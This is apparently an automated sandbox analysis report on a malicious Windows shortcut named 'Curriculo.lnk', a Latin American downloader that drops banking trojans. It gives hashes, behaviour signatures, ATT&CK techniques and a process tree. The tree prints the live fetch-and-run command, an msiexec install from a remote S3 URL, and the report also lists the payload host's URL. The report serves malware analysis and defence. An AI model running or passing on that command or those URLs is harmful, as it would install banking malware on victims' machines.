latam_generic_downloader | 215404787c1d072eca5cd4423fae4e01d08527657971abf480b753e78ddecbde

Analysis

max time kernel
123s
max time network
123s
platform
windows7_x64
resource
win7-en-20211104
submitted
16/11/2021, 19:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Curriculo.lnk
Size

1KB
MD5

58fe09ef368f345697e2815274739431
SHA1

8b16a02c2afb084e89b12e1a224382165a294bc7
SHA256

215404787c1d072eca5cd4423fae4e01d08527657971abf480b753e78ddecbde
SHA512

edfbb3716b1e7e2bbab6415de74f06e0a28c1f68d3d7dfbf7ee154161295c00c8314359168c5f6eb851a93d1e1c1311fb77217bd83f97b224206fd01e048019d

Score

10^/10

latam_generic_downloader banker loader

Malware Config

Extracted

Family

latam_generic_downloader

http://ec2-52-53-236-128.us-west-1.compute.amazonaws.com/softcom.base

Signatures

Generic LATAM Downloader
Generic Latin American MSI downloader used to drop various banking trojans.
loader banker latam_generic_downloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1732	msiexec.exe
9	1436	MsiExec.exe

Loads dropped DLL 2 IoCs

pid	Process
1436	MsiExec.exe
1436	MsiExec.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
1732	msiexec.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIE5EC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIECCF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEED3.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	msiexec.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1732	msiexec.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1732	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1732	msiexec.exe
Token: SeRestorePrivilege	1732	msiexec.exe
Token: SeTakeOwnershipPrivilege	1732	msiexec.exe
Token: SeRestorePrivilege	1032	msiexec.exe
Token: SeTakeOwnershipPrivilege	1032	msiexec.exe
Token: SeSecurityPrivilege	1032	msiexec.exe
Token: SeCreateTokenPrivilege	1732	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1732	msiexec.exe
Token: SeLockMemoryPrivilege	1732	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1732	msiexec.exe
Token: SeMachineAccountPrivilege	1732	msiexec.exe
Token: SeTcbPrivilege	1732	msiexec.exe
Token: SeSecurityPrivilege	1732	msiexec.exe
Token: SeTakeOwnershipPrivilege	1732	msiexec.exe
Token: SeLoadDriverPrivilege	1732	msiexec.exe
Token: SeSystemProfilePrivilege	1732	msiexec.exe
Token: SeSystemtimePrivilege	1732	msiexec.exe
Token: SeProfSingleProcessPrivilege	1732	msiexec.exe
Token: SeIncBasePriorityPrivilege	1732	msiexec.exe
Token: SeCreatePagefilePrivilege	1732	msiexec.exe
Token: SeCreatePermanentPrivilege	1732	msiexec.exe
Token: SeBackupPrivilege	1732	msiexec.exe
Token: SeRestorePrivilege	1732	msiexec.exe
Token: SeShutdownPrivilege	1732	msiexec.exe
Token: SeDebugPrivilege	1732	msiexec.exe
Token: SeAuditPrivilege	1732	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1732	msiexec.exe
Token: SeChangeNotifyPrivilege	1732	msiexec.exe
Token: SeRemoteShutdownPrivilege	1732	msiexec.exe
Token: SeUndockPrivilege	1732	msiexec.exe
Token: SeSyncAgentPrivilege	1732	msiexec.exe
Token: SeEnableDelegationPrivilege	1732	msiexec.exe
Token: SeManageVolumePrivilege	1732	msiexec.exe
Token: SeImpersonatePrivilege	1732	msiexec.exe
Token: SeCreateGlobalPrivilege	1732	msiexec.exe
Token: SeRestorePrivilege	1032	msiexec.exe
Token: SeTakeOwnershipPrivilege	1032	msiexec.exe
Token: SeRestorePrivilege	1032	msiexec.exe
Token: SeTakeOwnershipPrivilege	1032	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1732	msiexec.exe
1732	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 592 wrote to memory of 1732	592	cmd.exe	29
PID 592 wrote to memory of 1732	592	cmd.exe	29
PID 592 wrote to memory of 1732	592	cmd.exe	29
PID 592 wrote to memory of 1732	592	cmd.exe	29
PID 592 wrote to memory of 1732	592	cmd.exe	29
PID 1032 wrote to memory of 1436	1032	msiexec.exe	31
PID 1032 wrote to memory of 1436	1032	msiexec.exe	31
PID 1032 wrote to memory of 1436	1032	msiexec.exe	31
PID 1032 wrote to memory of 1436	1032	msiexec.exe	31
PID 1032 wrote to memory of 1436	1032	msiexec.exe	31
PID 1032 wrote to memory of 1436	1032	msiexec.exe	31
PID 1032 wrote to memory of 1436	1032	msiexec.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Curriculo.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:592
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "https://kr0.s3.eu-central-1.amazonaws.com/lnstaIIg.msi"
  2⤵
  - Blocklisted process makes network request
  - Use of msiexec (install) with remote resource
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1732

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 335717A7A085D06EAA51E9810F8E2749
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:1436

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/592-55-0x000007FEFB751000-0x000007FEFB753000-memory.dmp

Filesize
8KB

Download
memory/1436-61-0x0000000075BB1000-0x0000000075BB3000-memory.dmp

Filesize
8KB

Download